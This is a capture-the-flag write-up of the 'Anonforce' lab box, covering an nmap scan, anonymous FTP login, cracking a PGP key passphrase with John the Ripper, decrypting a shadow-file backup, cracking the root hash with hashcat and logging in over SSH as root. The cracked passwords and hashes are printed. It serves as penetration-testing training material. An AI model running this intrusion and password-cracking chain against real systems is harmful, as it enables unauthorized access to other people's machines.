Challenge Overview

Anonforce is a boot-to-root challenge from BSides Guatemala CTF that involves exploiting an FTP server with anonymous access. The challenge requires decrypting PGP files, cracking password hashes, and ultimately gaining root access to retrieve the final flag.

Enumeration

Nmap Scan

We begin with a port scan to identify open services on the target:

nmap -A -oN nmap.txt 10.10.182.27

Scan Results:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.14.102.54
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
| drwxr-xr-x   17 0        0            3700 Oct 25 03:22 dev
| drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
| drwx------    2 0        0           16384 Aug 11  2019 lost+found
| drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
| drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
| drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread [NSE: writeable]
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
| dr-xr-xr-x   87 0        0               0 Oct 25 03:22 proc
| drwx------    3 0        0            4096 Aug 11  2019 root
| drwxr-xr-x   18 0        0             540 Oct 25 03:22 run
| drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
| dr-xr-xr-x   13 0        0               0 Oct 25 03:22 sys
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8af9483e11a1aafcb78671d02af624e7 (RSA)
|   256 735dde9a886e647ae187ec65ae1193e3 (ECDSA)
|_  256 56f99f24f152fc16b77ba3e24f17b4ea (ED25519)

Key Findings:

• Port 21 (FTP): Anonymous login is allowed
• Port 22 (SSH): OpenSSH service available
• Notable Directory: The /notread directory is world-writable

Initial Access

FTP Enumeration

Since anonymous login is permitted, we connect to the FTP service:

ftp 10.10.182.27

Connected to 10.10.182.27.
220 (vsFTPd 3.0.3)
Name (10.10.182.27:rether): anonymous
331 Please specify the password.
Password:
230 Login successful.

The Nmap scan reveals an interesting directory: /notread, which is world-writable. Let's explore this directory:

ftp> cd notread
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||65228|)
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000         1083 Aug 11  2019 backup.pgp
-rw-r--r--    1 1000     1000         1735 Aug 11  2019 private.asc
226 Directory send OK.

We find two files:

• backup.pgp - An encrypted PGP file
• private.asc - A private key file

These files appear to be related - we likely need to extract the passphrase from private.asc to decrypt backup.pgp.

IMPORTANT

User flag location: /home/melodias/user.txt

Hash Cracking and Decryption

Extracting the PGP Key Passphrase

The private.asc file is a GPG private key that's encrypted with a passphrase. We can extract the hash using gpg2john and then crack it with John the Ripper:

gpg2john private.asc > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Output:

xbox360          (anonforce)

The passphrase is xbox360.

Decrypting the Backup File

Now we can decrypt the backup.pgp file using the cracked passphrase:

gpg --import private.asc
gpg --decrypt backup.pgp > backup_decrypted

When prompted for the passphrase, enter: xbox360

Let's examine the decrypted contents:

cat backup_decrypted

Output:

root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
# ... more entries

Perfect! The decrypted file contains shadow file entries for two users:

• root - with a SHA-512 hash
• melodias - with an MD5 hash

Cracking the Root Password

The root user's hash is in SHA-512 format. Let's crack it using Hashcat with hash mode 1800 (sha512crypt):

echo '$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0' > root-hash.txt
hashcat -m 1800 root-hash.txt /usr/share/wordlists/rockyou.txt

Output:

$6$07nYFaYf...:hikari

The root password is hikari.

Root Access

SSH Login

Now we can login to the system as the root user via SSH:

ssh root@10.10.182.27
# password: hikari

Output:

root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)

Success! We now have root access to the system.

IMPORTANT

Root flag location: /root/root.txt